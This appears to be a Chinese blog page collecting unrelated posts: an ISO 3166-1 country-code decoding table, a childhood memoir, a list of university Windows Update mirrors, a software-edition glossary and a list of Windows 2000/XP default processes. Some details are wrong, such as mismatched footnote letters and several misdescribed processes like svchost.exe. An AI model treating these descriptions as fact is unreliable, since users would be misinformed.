ISO 3166-1 国家代码表

  • Standards
  • ISO 3166 – Country codes
  • ISO 3166-1 decoding table

ISO 3166-1 decoding table

Last updated:  2012-08-02

 

This decoding table provides the user of ISO 3166-1 with an easy access to the definition  of all 676 code elements available in the alpha-2 code of ISO’s country code standard.

The  content of this document is taken from two sources: The official code list of ISO 3166-1 and the list  of reserved ISO 3166-1 code elements which contains information on code allocations which are not officially  part of ISO 3166-1 (see “Reserved code elements”). The reserved code elements  have different statuses with regard to restrictions on use within ISO’s country code system. Some may  be used – others must not be used.

These statuses – and their approximate meanings  for the user of ISO 3166-1 – are described and colour-coded in Table 1. Tables 2 gives a colour coded,  clickable matrix of all ISO 3166-1 alpha-2 code elements which is linked to Table 3 which gives the  definition of the code element.

For more detailed information please refer  to the section on “Reserved code elements” on our Website.

Contact the ISO 3166 Maintenance Agency

The  ISO 3166/MA  should be contacted through its secretariat. Please use the following address:

ISO  3166 Maintenance Agency c/o International Organization for Standardization Case  postale 56 CH-1211 Genève 20

Telephone: +41 22 749 02 22 Telefax:  +41 22 749 01 55 E-mail: mbinfo@iso.org Web: www.iso.org/iso/country_codes

 

Color
Status of code element What it means
Officially assigned code element Code element may be used without restriction
User-assigned code element Code element may be used without restriction
Exceptionally reserved code element Code element may be used but restrictions may apply
Transitionally reserved code element Code element deleted from ISO 3166-1; stop using ASAP
Indeterminately reserved code element Code element must not be used in ISO 3166-1
Code elements not used at present stage [A] Code element must not be used in ISO 3166-1
Un-assigned code elements Code element free for assignment (by ISO 3166/MA only!)
AA AB AC AD AE AF AG AH AI AJ AK AL AM AN AO AP AQ AR AS AT AU AV AW AX AY AZ
BA BB BC BD BE BF BG BH BI BJ BK BL BM BN BO BP BQ BR BS BT BU BV BW BX BY BZ
CA CB CC CE CD CF CG CH CI CJ CK CL CM CN CO CP CQ CR CS CT CU CV CW CX CY CZ
DA DB DC DD DE DF DG DH DI DJ DK DL DM DN DO DP DQ DR DS DT DU DV DW DX DY DZ
EA EB EC ED EE EF EG EH EI EJ EK EL EM EN EO EP EQ ER ES ET EU EV EW EX EY EZ
FA FB FC FD FE FF FG FH FI FJ FK FL FM FN FO FP FQ FR FS FT FU FV FW FX FY FZ
GA GB GC GD GE GF GG GH GI GJ GK GL GM GN GO GP GQ GR GS GT GU GV GW GX GY GZ
HA HB HC HD HE HF HG HH HI HJ HK HL HM HN HO HP HQ HR HS HT HU HV HW HX HY HZ
IA IB IC ID IE IF IG IH II IJ IK IL IM IN IO IP IQ IR IS IT IU IV IW IX IY IZ
JA JB JC JD JE JF JG JH JI JJ JK JL JM JN JO JP JQ JR JS JT JU JV JW JX JY JZ
KA KB KC KD KE KF KG KH KI KJ KK KL KM KN KO KP KQ KR KS KT KU KV KW KX KY KZ
LA LB LC LD LE LF LG LH LI LJ LK LL LM LN LO LP LQ LR LS LT LU LV LW LX LY LZ
MA MB MC MD ME MF MG MH MI MJ MK ML MM MN MO MP MQ MR MS MT MU MV MW MX MY MZ
NA NB NC ND NE NF NG NH NI NJ NK NL NM NN NO NP NQ NR NS NT NU NV NW NX NY NZ
OA OB OC OD OE OF OG OH OI OJ OK OL OM ON OO OP OQ OR OS OT OU OV OW OX OY OZ
PA PB PC PD PE PF PG PH PI PJ PK PL PM PN PO PP PQ PR PS PT PU PV PW PX PY PZ
QA QB QC QD QE QF QG QH QI QJ QK QL QM QN QO QP QQ QR QS QT QU QV QW QX QY QZ
RA RB RC RD RE RF RG RH RI RJ RK RL RM RN RO RP RQ RR RS RT RU RV RW RX RY RZ
SA SB SC SD SE SF SG SH SI SJ SK SL SM SN SO SP SQ SR SS ST SU SV SW SX SY SZ
TA TB TC TD TE TF TG TH TI TJ TK TL TM TN TO TP TQ TR TS TT TU TV TW TX TY TZ
UA UB UC UD UE UF UG UH UI UJ UK UL UM UN UO UP UQ UR US UT UU UV UW UX UY UZ
VA VB VC VD VE VF VG VH VI VJ VK VL VM VN VO VP VQ VR VS VT VU VV VW VX VY VZ
WA WB WC WD WE WF WG WH WI WJ WK WL WM WN WO WP WQ WR WS WT WU WV WW WX WY WZ
XA XB XC XD XE XF XG XH XI XJ XK XL XM XN XO XP XQ XR XS XT XU XV XW XX XY XZ
YA YB YC YD YE YF YG YH YI YJ YK YL YM YN YO YP YQ YR YS YT YU YV YW YX YY YZ
ZA ZB ZC ZD ZE ZF ZG ZH ZI ZJ ZK ZL ZM ZN ZO ZP ZQ ZR ZS ZT ZU ZV ZW ZX ZY ZZ
Code Name Remark Status
AA user-assigned
AC Ascension Island [B] Requested by Universal Postal Union (UPU) exceptionally reserved
AD ANDORRA officially assigned
AE UNITED ARAB EMIRATES officially assigned
AF AFGHANISTAN officially assigned
AG ANTIGUA AND BARBUDA officially assigned
AI ANGUILLA officially assigned
AL ALBANIA officially assigned
AM ARMENIA officially assigned
AN Netherlands Antilles 2011-12 to 2061-12 transitionally reserved
AO ANGOLA officially assigned
AP African Regional Industrial Property Organization [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
AQ ANTARCTICA officially assigned
AR ARGENTINA officially assigned
AS AMERICAN SAMOA officially assigned
AT AUSTRIA officially assigned
AU AUSTRALIA officially assigned
AW ARUBA officially assigned
AX ÅLAND ISLANDS officially assigned
AZ AZERBAIJAN officially assigned
BA BOSNIA AND HERZEGOVINA officially assigned
BB BARBADOS officially assigned
BD BANGLADESH officially assigned
BE BELGIUM officially assigned
BF BURKINA FASO officially assigned
BG BULGARIA officially assigned
BH BAHRAIN officially assigned
BI BURUNDI officially assigned
BJ BENIN officially assigned
BL SAINT BARTHÉLEMY officially assigned
BM BERMUDA officially assigned
BN BRUNEI DARUSSALAM officially assigned
BO BOLIVIA, PLURINATIONAL STATE OF officially assigned
BQ BONAIRE, SINT EUSTATIUS AND SABA officially assigned
BR BRAZIL officially assigned
BS BAHAMAS officially assigned
BT BHUTAN officially assigned
BU Burma 1989-12 to 2039-12 transitionally reserved
BV BOUVET ISLAND officially assigned
BW BOTSWANA officially assigned
BX Benelux Trademarks and Designs Office [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
BY BELARUS officially assigned
BZ BELIZE officially assigned
CA CANADA officially assigned
CC COCOS (KEELING) ISLANDS officially assigned
CD CONGO, THE DEMOCRATIC REPUBLIC OF THE officially assigned
CF CENTRAL AFRICAN REPUBLIC officially assigned
CG CONGO officially assigned
CH SWITZERLAND officially assigned
CI CÔTE D’IVOIRE officially assigned
CK COOK ISLANDS officially assigned
CL CHILE officially assigned
CM CAMEROON officially assigned
CN CHINA officially assigned
CO COLOMBIA officially assigned
CP Clipperton Island [C] Requested by International Telecommunication Union (ITU) exceptionally reserved
CR COSTA RICA officially assigned
CS SERBIA AND MONTENEGRO 2006-09 to 2056-09 transitionally reserved
CU CUBA officially assigned
CV CAPE VERDE officially assigned
CW CURAÇAO officially assigned
CX CHRISTMAS ISLAND officially assigned
CY CYPRUS officially assigned
CZ CZECH REPUBLIC officially assigned
DE GERMANY officially assigned
DG Diego Garcia [C] Requested by International Telecommunication Union (ITU) exceptionally reserved
DJ DJIBOUTI officially assigned
DK DENMARK officially assigned
DM DOMINICA officially assigned
DO DOMINICAN REPUBLIC officially assigned
DY Benin [D] Requested by Secretary-General of UN for Road Traffic Conventions R49 and R68 indeterminately reserved
DZ ALGERIA officially assigned
EA Ceuta, Melilla [E] Requested by World Customs Organization (WCO) exceptionally reserved
EC ECUADOR officially assigned
EE ESTONIA officially assigned
EF Union of Countries under the European Community Patent Convention [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
EG EGYPT officially assigned
EH WESTERN SAHARA officially assigned
EM European Trademark Office [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
EP European Patent Organization [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
ER ERITREA officially assigned
ES SPAIN officially assigned
ET ETHIOPIA officially assigned
EU European Union Requested by ISO 4217/MA (March 1998) for ISO 6166 “Securities – International securities identification numbering system (ISIN)”. In August 1999, extension of scope to any application needing to represent the name European Union. exceptionally reserved
EV Eurasian Patent Organization [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
EW Estonia [D] indeterminately reserved
FI FINLAND officially assigned
FJ FIJI officially assigned
FK FALKLAND ISLANDS (MALVINAS) officially assigned
FL Liechtenstein [D] indeterminately reserved
FM MICRONESIA, FEDERATED STATES OF officially assigned
FO FAROE ISLANDS officially assigned
FR FRANCE officially assigned
FX France, Metropolitan Requested by France exceptionally reserved
GA GABON officially assigned
GB UNITED KINGDOM officially assigned
GC Patent Office of the Cooperation Council for the Arab States of the Gulf (GCC) [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
GD GRENADA officially assigned
GE GEORGIA officially assigned
GF FRENCH GUIANA officially assigned
GG GUERNSEY officially assigned
GH GHANA officially assigned
GI GIBRALTAR officially assigned
GL GREENLAND officially assigned
GM GAMBIA officially assigned
GN GUINEA officially assigned
GP GUADELOUPE officially assigned
GQ EQUATORIAL GUINEA officially assigned
GR GREECE officially assigned
GS SOUTH GEORGIA AND THE SOUTH SANDWICH ISLANDS officially assigned
GT GUATEMALA officially assigned
GU GUAM officially assigned
GW GUINEA-BISSAU officially assigned
GY GUYANA officially assigned
HK HONG KONG officially assigned
HM HEARD ISLAND AND MCDONALD ISLANDS officially assigned
HN HONDURAS officially assigned
HR CROATIA officially assigned
HT HAITI officially assigned
HU HUNGARY officially assigned
IB International Bureau of WIPO [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
IC Canary Islands [E] Requested by World Customs Organization (WCO) exceptionally reserved
ID INDONESIA officially assigned
IE IRELAND officially assigned
IL ISRAEL officially assigned
IM ISLE OF MAN officially assigned
IN INDIA officially assigned
IO BRITISH INDIAN OCEAN TERRITORY officially assigned
IQ IRAQ officially assigned
IR IRAN, ISLAMIC REPUBLIC OF officially assigned
IS ICELAND officially assigned
IT ITALY officially assigned
JA Jamaica [F] Requested by Secretary-General of UN for Road Traffic Conventions indeterminately reserved
JE JERSEY officially assigned
JM JAMAICA officially assigned
JO JORDAN officially assigned
JP JAPAN officially assigned
KE KENYA officially assigned
KG KYRGYZSTAN officially assigned
KH CAMBODIA officially assigned
KI KIRIBATI officially assigned
KM COMOROS officially assigned
KN SAINT KITTS AND NEVIS officially assigned
KP KOREA, DEMOCRATIC PEOPLE’S REPUBLIC OF officially assigned
KR KOREA, REPUBLIC OF officially assigned
KW KUWAIT officially assigned
KY CAYMAN ISLANDS officially assigned
KZ KAZAKHSTAN officially assigned
LA LAO PEOPLE’S DEMOCRATIC REPUBLIC officially assigned
LB LEBANON officially assigned
LC SAINT LUCIA officially assigned
LF Libya Fezzan [D] indeterminately reserved
LI LIECHTENSTEIN officially assigned
LK SRI LANKA officially assigned
LR LIBERIA officially assigned
LS LESOTHO officially assigned
LT LITHUANIA officially assigned
LU LUXEMBOURG officially assigned
LV LATVIA officially assigned
LY LIBYA officially assigned
MA MOROCCO officially assigned
MC MONACO officially assigned
MD MOLDOVA, REPUBLIC OF officially assigned
ME MONTENEGRO officially assigned
MF SAINT MARTIN (FRENCH PART) officially assigned
MG MADAGASCAR officially assigned
MH MARSHALL ISLANDS officially assigned
MK MACEDONIA, THE FORMER YUGOSLAV REPUBLIC OF officially assigned
ML MALI officially assigned
MM MYANMAR officially assigned
MN MONGOLIA officially assigned
MO MACAO officially assigned
MP NORTHERN MARIANA ISLANDS officially assigned
MQ MARTINIQUE officially assigned
MR MAURITANIA officially assigned
MS MONTSERRAT officially assigned
MT MALTA officially assigned
MU MAURITIUS officially assigned
MV MALDIVES officially assigned
MW MALAWI officially assigned
MX MEXICO officially assigned
MY MALAYSIA officially assigned
MZ MOZAMBIQUE officially assigned
NA NAMIBIA officially assigned
NC NEW CALEDONIA officially assigned
NE NIGER officially assigned
NF NORFOLK ISLAND officially assigned
NG NIGERIA officially assigned
NI NICARAGUA officially assigned
NL NETHERLANDS Includes: the islands Bonaire, Saint Eustatius and Saba officially assigned
NO NORWAY officially assigned
NP NEPAL officially assigned
NR NAURU officially assigned
NT Neutral Zone 1993-07 to 2043-07 transitionally reserved
NU NIUE officially assigned
NZ NEW ZEALAND officially assigned
OA African Intellectual Property Organization [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
OM OMAN officially assigned
PA PANAMA officially assigned
PE PERU officially assigned
PF FRENCH POLYNESIA officially assigned
PG PAPUA NEW GUINEA officially assigned
PH PHILIPPINES officially assigned
PI Philippines [F] indeterminately reserved
PK PAKISTAN officially assigned
PL POLAND officially assigned
PM SAINT PIERRE AND MIQUELON officially assigned
PN PITCAIRN officially assigned
PR PUERTO RICO officially assigned
PS PALESTINIAN TERRITORY, OCCUPIED officially assigned
PT PORTUGAL officially assigned
PW PALAU officially assigned
PY PARAGUAY officially assigned
QA QATAR officially assigned
QM user-assigned
QN user-assigned
QO user-assigned
QP user-assigned
QQ user-assigned
QR user-assigned
QS user-assigned
QT user-assigned
QU user-assigned
QV user-assigned
QW user-assigned
QX user-assigned
QY user-assigned
QZ user-assigned
RA Argentina [F] indeterminately reserved
RB Bolivia [cf. Botswana: identical code element] [D] indeterminately reserved
RC China [F] indeterminately reserved
RE RÉUNION officially assigned
RH Haiti [D] indeterminately reserved
RI Indonesia [F] indeterminately reserved
RL Lebanon [F] indeterminately reserved
RM Madagascar [F] indeterminately reserved
RN Niger [G] indeterminately reserved
RO ROMANIA officially assigned
RP Philippines [G] indeterminately reserved
RS SERBIA officially assigned
RU RUSSIAN FEDERATION officially assigned
RW RWANDA officially assigned
SA SAUDI ARABIA officially assigned
SB SOLOMON ISLANDS officially assigned
SC SEYCHELLES officially assigned
SD SUDAN officially assigned
SE SWEDEN officially assigned
SF Finland [D] indeterminately reserved
SG SINGAPORE officially assigned
SH SAINT HELENA, ASCENSION AND TRISTAN DA CUNHA officially assigned
SI SLOVENIA officially assigned
SJ SVALBARD AND JAN MAYEN officially assigned
SK SLOVAKIA officially assigned
SL SIERRA LEONE officially assigned
SM SAN MARINO officially assigned
SN SENEGAL officially assigned
SO SOMALIA officially assigned
SR SURINAME officially assigned
SS SOUTH SUDAN officially assigned
ST SAO TOME AND PRINCIPE officially assigned
SU USSR Requested by Foundation of Internet Development (FID) exceptionally reserved
SV EL SALVADOR officially assigned
SX SINT MAARTEN (DUTCH PART) The island of Saint Martin is divided into the French northern part and the Dutch southern part officially assigned
SY SYRIAN ARAB REPUBLIC officially assigned
SZ SWAZILAND officially assigned
TA Tristan da Cunha [B] Requested by Universal Postal Union (UPU) exceptionally reserved
TC TURKS AND CAICOS ISLANDS officially assigned
TD CHAD officially assigned
TF FRENCH SOUTHERN TERRITORIES officially assigned
TG TOGO officially assigned
TH THAILAND officially assigned
TJ TAJIKISTAN officially assigned
TK TOKELAU officially assigned
TL TIMOR-LESTE officially assigned
TM TURKMENISTAN officially assigned
TN TUNISIA officially assigned
TO TONGA officially assigned
TP East Timor 2002-05 to 2052-05 transitionally reserved
TR TURKEY officially assigned
TT TRINIDAD AND TOBAGO officially assigned
TV TUVALU officially assigned
TW TAIWAN, PROVINCE OF CHINA officially assigned
TZ TANZANIA, UNITED REPUBLIC OF officially assigned
UA UKRAINE officially assigned
UG UGANDA officially assigned
UK United Kingdom Requested by United Kingdom exceptionally reserved
UM UNITED STATES MINOR OUTLYING ISLANDS officially assigned
US UNITED STATES officially assigned
UY URUGUAY officially assigned
UZ UZBEKISTAN officially assigned
VA HOLY SEE (VATICAN CITY STATE) officially assigned
VC SAINT VINCENT AND THE GRENADINES officially assigned
VE VENEZUELA, BOLIVARIAN REPUBLIC officially assigned
VG VIRGIN ISLANDS, BRITISH officially assigned
VI VIRGIN ISLANDS, U.S. officially assigned
VN VIET NAM officially assigned
VU VANUATU officially assigned
WF WALLIS AND FUTUNA officially assigned
WG Grenada [D] indeterminately reserved
WL Saint Lucia [D] indeterminately reserved
WO World Intellectual Property Organization [A] Requested by World Intellectual Property Organization (WIPO) for use in Standard ST.3 indeterminately reserved
WS SAMOA officially assigned
WV Saint Vincent [D] indeterminately reserved
XA user-assigned
XB user-assigned
XC user-assigned
XD user-assigned
XE user-assigned
XF user-assigned
XG user-assigned
XH user-assigned
XI user-assigned
XJ user-assigned
XK user-assigned
XL user-assigned
XM user-assigned
XN user-assigned
XO user-assigned
XP user-assigned
XQ user-assigned
XR user-assigned
XS user-assigned
XT user-assigned
XU user-assigned
XV user-assigned
XW user-assigned
XX user-assigned
XY user-assigned
XZ user-assigned
YE YEMEN officially assigned
YT MAYOTTE officially assigned
YU Yugoslavia 2003-07 to 2053-07 transitionally reserved
YV Venezuela [D] indeterminately reserved
ZA SOUTH AFRICA officially assigned
ZM ZAMBIA officially assigned
ZR Zaire 1997-07 to 2047-07 transitionally reserved
ZW ZIMBABWE officially assigned
ZZ user-assigned

Notes:

 

[A]  The World Intellectual Property Organization (WIPO) uses ten alpha-2 code elements for particular purposes  in its Standard ST.3 which are not assigned in ISO 3166-1. The ISO 3166/MA will not use these alpha-2  code elements for assignment in ISO 3166 at the present stage.

[B]  Official country names are given in CAPITAL LETTERS. Other names are given in normal orthography i.e  including lower case letters.

[C]  The list of ISO 3166-1 reserved code elements is only available in English, hence the lack of French  names for entries which are not officially included in ISO 3166-1.

[D] Here the following pieces of information can  be given:

  • Acronym of organization or name of country  on whose behalf a reservation was made
  • Date of reservation (for transitional reservations)
  • Abbreviation of source document for reserved code element
  • Explanatory text

我童年的思维


总有人说我不正常,久了我也不说什么了! 也许你和我一样相信”谎言说一千遍也会变成真理”这句话.
话说多了烦! 有话不说的人让人急,感觉没有信任感. 也可能是因为还不够了解. 所以我还是写些好,写给想要了解我,即将了解我或者还不够了解我的人. 夜深时总想些什么.
过去的,现在的; 现实的,飘渺的; 将要发生的和不会实现的.
而且每次思路是那样的清晰,流畅. 可常常想过很多很多,睡去醒来,依然淡忘了一切.
我总想把它记下来. 可每每拿上纸笔,敲击键盘,脑中又空无一片.
所以没有人知道我想过的是什么.连我自己也不知道. 也许正是这样,在满脑子都是想法的时候,我们都很想找个人与她(他)分享这些信息.
也许是为了做个数据备份.也许是IP广播或Ping一下,希望收到一个回应信号.
可尝试过这种做法,你会觉得效果并不是很好.
像系统一样,可能协议不匹配,系统不兼容,数据包丢失,最怕的是发了收不到回应,你连发送成功与否都不明了.
也许她装了防火墙,把你过滤了;或许她的朋友,家人给她加装了杀毒,发现你就干死;更或许她的服务已占用99%的cpu,跟本无法再相应你的信号.再者她(他)可能压根不喜欢你这种用开放源代码的Linux或UNIX,长得丑,操作不便,关键你这玩意不要钱的,没一点保障.毕竟人家XP和Vista是大厂的出的,有后台技术支持! 打小,父母给我的参数和我自己的存档显示,我小时候话很少,且很老实,不爱出去玩.
不出去也就算了,一年作业就做到9,10点. 而且总坐着目光呆滞的发愣,时不时一阵微笑!
终于有第一天,被赶出家门,非让我出去玩,结果我哭着跑出去玩了.
注意,半个小时后,我和一个小伙在胡同开始PK,围观人群死多,知道我打不过也不帮忙!
其中一个湖南人还说:真好玩. 后来那家伙去了湖南卫视,策划了臭名昭著的<超级男生>.
PK失利后,在家修养了一段,刚重新找回自我,一天又被赶出去玩.
注意,又是半个小后,我满脸是血,很自豪的被一个小女孩送回家中.我没哭,倒是心里得意的想:看,还敢放我出去?
家人问,我说撞得,爸妈还有点不信! 至今我一直在想,他们怀疑我是被小女孩拿砖拍的!
不过我没解释,有点创意好不好,我到宁可他们想,是我一看表,半个小时了,就找个墙猛撞,没出血,再找块砖猛拍!
其实当时送我回家的小女孩是很喜欢我的,这是其他小孩告诉我的,可我不信! 因为我听见她送我进屋后对外面小孩说:他真衰(suǐ). 她太早熟了! 我快20年以后才知道suǐ啥意思! 更重要的是小时候我还出现《记忆裂痕》和《蝴蝶效应》中的记忆空白和丢失的现象.
所以推荐想了解我的人看看这些片子,你们会有启示.
幼儿园时,一次加餐费,我爸说送我到园门口,把钱包好放我小兜里了! 让我一进去,就交给老师.
结果我一进去老师问:加餐费带来了吗? 我大声说:家人没给我! 结果我很多天没吃上苹果,好像还有其他好吃的!
后来老师说家人,家人说老师. 我当时还认为她们都不爱我,这样虐待祖国的花朵! 后来还是补交了一份!
对,还有点要说,幼儿园时,由于妈上班远,爸上班忙,我都是全园最后一个被接回家的.后来长大爸也多次说这事.
记得那时的场景经常是阿姨(幼儿园老师)牵着我手,夕阳下站在门口等家人. 要麽就是把我一个人关在屋里玩积木,突然阿姨冲进来说:你爸终于来了! 你可以回家了! 感觉有种被保释的感觉! 我打小都记性不好.
有次小学刚上一年级,那时应该是爸妈第2次离婚时,我跟着爸.
一个周末,爸要上班,把我送到车站,给我两毛钱,让我坐公交(那是只有6路)去奶奶家.
走时不放心,特意把我交给两个等车的女兵,让她们照顾我到下车,说给的我有车钱.
爸走后,她们对我挺好的.然后我就什么什么都不知道了.
后面场景就直接公交到站了,车开走后看见站住个吃苹果类小孩. 从兜里还得意的掏出两毛钱,那就是我.
晚上俺爹吵我了! 说:啊! 人家带你坐车,不给钱,还吃人家苹果!? 我是真不记得了,肯定那趟车没售票员,不然我这么好个孩杂会不给钱类! 从小我都反对随大流! 很早都有自己不同的看法!
同样挺小的,刚上小学时吧,已经不再去女澡堂洗澡了.
一次晚上吃完饭,发现胡同好几个小孩都趴墙头的一块玻璃上看,还窃窃私语说啥:挺大,挺白?我说:啥? 他们说:女澡堂!
我一把爬上去. 挤半天没挤进去. 旁边还有个窗户,我看没人,心想我自己看,不给恁挤!
里面蒸汽濛濛,玻璃上还都是水珠,看半天看不清!

Windows Update 自动更新服务同步的镜像站点

 

Windows Update自动更新(SUS/软件更新服务)均是与微软的Windows Update自动更新服务同步的镜像站点.

这些Windows Update自动更新均是与微软Windows Update自动更新服务同步的镜像站点,在国内升级的话连接这些站点速度会比微软官方网站快得多。升级方法与效果与连接微软升级服务器完全相同.

如果你的XP,Win2003不能在线升级,可以到网上去查查,搜索一下,听说有了解决不能升级的办法,只需要简单修改一下注册表就行了. 但我还没有找到 ^_^

一下是国内的一些WindowsUpdate服务器
(不一定都能使用,有一些服务器做了限制,只有本地用户才可以)

上海外国语大学WindowsUpdate服务器
http://windowsupdate.shisu.edu.cn/

中原工学院WindowsUpdateService-自动更新服务SUS
http://windowsupdate.zzti.edu.cn

华中科技大学自动更新(Windows Update)服务
http://windowsupdate.hust.edu.cn/

哈尔滨工业大学WindowsUpdate自动更新服务
http://windowsupdate.hit.edu.cn/

西安交通大学软件学院WindowsUpdate服务器
http://202.117.21.253/

厦门大学网络中心WindowsUpdate自动更新服务
http://windowsupdate.xmu.edu.cn

上海交通大学WindowsUpdate自动更新服务
http://windowsupdate.sjtu.edu.cn

上海大学计算中心WindowsUpdate自动更新服务
http://windowsupdate.ccshu.net/windows/

网协本地WindowsUpdate自动更新服务
http://www.nxis.org.cn/

天津外国语学院信息网络中心WindowsUpdate自动更新服务
http://windowsupdate.tjfsu.edu.cn/

河北工业大学软件学院WindowsUpdate自动更新服务
http://windowsupdate.scse.hebut.edu.cn/

华南农业大学WindowsUpdate自动更新服务
http://sus.scau.edu.cn/

四川大学WindowsUpdate服务器
http://windowsupdate.scu.edu.cn/

软件版本号说明

软件版本号说明

 

alphal 内部测试版

beta 外部测试版

demo 演示版

Enhance 增强版或者加强版 属于正式版

Free 自由版

Full version 完全版 属于正式版

shareware 共享版

Release 发行版 有时间限制

Upgrade 升级版

Retail 零售版

Cardware 属共享软件的一种,只要给作者回复一封电邮或明信片即可。
(有的作者并由此提供注册码  等),目前这种形式已不多见。

Plus 属增强版,不过这种大部分是在程序界面及多媒体功能上增强。

Preview 预览版

Corporation & Enterprise 企业版

Standard 标准版

Mini 迷你版也叫精简版只有最基本的功能

Premium — 贵价版

Professional — 专业版

Express — 特别版

Deluxe — 豪华版

Regged — 已注册版

CN — 简体中文版

CHT — 繁体中文版

EN — 英文版

Multilanguage — 多语言版
Rip 是指从原版文件(一般是指光盘或光盘镜像文件)直接将有用的内容(核心内容)分离出来,剔除无用的文档,例如PDF说明文件啊,视频演示啊之类的东西,也 可以算做是精简版吧…但主要内容功能是一点也不能缺少的!另:DVDrip是指将视频和音频直接从DVD光盘里以文件方式分离出来。

trail 试用版(含有某些限制,如时间、功能,注册后也有可能变为正式版)

RC 版。是 Release Candidate 的缩写,意思是发布倒计时,该版本已经完成全部功能并清除大部分的BUG。到了这个阶段只会除BUG,不会对软件做任何大的更改。

RTM 版。这基本就是最终的版本,英文是 Release To Manufactur,意思是发布到生产商。

Original Equipment Manufacturer (OEM)

You may license products through an Original Equipment Manufacturer (OEM).
These products, such as Windows operating systems, come installed when you purchase a new computer.

OEM软件是给电脑生产厂的版本,无需多说。

Full Packaged Product (FPP)–Retail

Physical, shrink-wrapped boxes of licensed product that can be purchased in a local retail store or any local software retailer.

FPP就是零售版(盒装软件),这种产品的光盘的卷标都带有”FPP”字样,比如英文WXP Pro的FPP版本的光盘卷标就是WXPFPP_EN,其中WX表示是Windows XP,P是Professional(H是Home),FPP表明是零售版本,EN是表明是英语。获得途径除了在商店购买之外,某些MSDN用户也可以得 到。

Volume Licensing for Organizations (VLO)

You may enjoy potentially significant savings by acquiring multiple product licenses. Depending on the size and type of your organization.

团体批量许可证(大量采购授权合约),这是为团体购买而制定的一种优惠方式。这种产品的光盘的卷标都带有”VOL”字样,取”Volume”前 3个字母,以表明是批量,比如英文WXP Pro的VOL版本的光盘卷标就是WXPVOL_EN,其中WX表示是Windows XP,P是Professional(VOL没有Home版本),VOL表明是团体批量许可证版本,EN是表明是英语。获得途径主要是集团购买,某些 MSDN用户也可以得到。
这种版本根据购买数量等又细分为“开放式许可证”、“选择式许可证”、“企业协议”、“学术教育许可证”等以下5种版本

Open License
Select License
Enterprise Agreement
Enterprise Subscription Agreement
Academic Volume Licensing

由此可见,平时说的什么select/corp是许可证授权方式,他的出现是为了用若干种不同级别的优惠政策卖同一种软件,通过select /corp许可证授权方式得到的xxx的光盘都是VOL这一种、是并不是有很多种,只不过是相同的VOL光盘配以不同的许可证方式;而Volume Licensing (Product) Keys,即VLK,它所指的只是一个Key(密匙),仅仅是一个为证明产品合法化、以及安装所使用的Key,因为根据VOL计划规定,VOL产品是不需 要激活的!

或者说,VLK不是指一种版本,而是指这种版本在部署(deploy)过程中所需要的Key,而需要VLK这种Key的版本应该叫做VOL!只 不过在实际中,没有必要强调这种叫法、称呼的准确性,加之很多人的VOL版本光盘是通过企业的选择式许可证、企业协议等方式得到的等等原因,所以才会有很 多人叫他为“选择版”等等。
官方网站有一个表格,上面有一句话:“Different products require different Volume Licensing Keys (VLKs). Refer to the table below to make sure you have the correct VLK for your Microsoft product.”,我想这就很好的说明了VLK指的是Key而不是产品了。 很明显的,FPP需要激活,VOL不需要激活。
出处:PConline

Win2000/XP系统缺省进程

Win2000/XP系统缺省进程

在Windows 2000 和XP中,系统包含以下缺省进程:
Csrss.exe
Explorer.exe
Internat.exe
Lsass.exe
Mstask.exe
Smss.exe
Spoolsv.exe
Svchost.exe
Services.exe
System
System Idle Process
Taskmgr.exe
Winlogon.exe
Winmgmt.exe 下面列出更多的进程和它们的简要说明 进程名描述 smss.exeSessionManager
csrss.exe 子系统服务器进程
winlogon.exe管理用户登录
services.exe包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
svchost.exe Windows 2000/XP 的文件保护系统
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe资源管理器
internat.exe托盘区的拼音图标)
mstask.exe允许程序在指定时间运行。
regsvc.exe允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exemsftpsvc,w3svc,iisadmn
tlntsvr.exe tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。
termsrv.exe termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。
ups.exe 管理连接到计算机的不间断电源(UPS)。
wins.exe为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
llssrv.exe证书记录服务
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。
RsSub.exe 控制用来远程储存数据的媒体。
locator.exe 管理 RPC 名称服务数据库。
lserver.exe 注册客户端许可证。
dfssvc.exe管理分布于局域网或广域网的逻辑卷。
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统或其它事务保护护资源管理器。
faxsvc.exe帮助您发送和接收传真。
cisvc.exe 索引服务
dmadmin.exe 磁盘管理请求的系统管理服务。
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
netdde.exe提供动态数据交换 (DDE) 的网络传输和安全特性。
smlogsvc.exe配置性能日志和警报。
rsvp.exe为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功功能。
RsEng.exe 协调用来储存不常用数据的服务和管理工具。
RsFsa.exe 管理远程储存的文件的操作。
grovel.exe扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间(只对 NTFS 文件系统有用)。
SCardSvr.ex 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。
snmptrap.exe接收由本地或远程 SNMP 代理程序产生的陷阱(trap)消息,然后将消息传递到运行在这台计算机上 SNMP 管理程序。
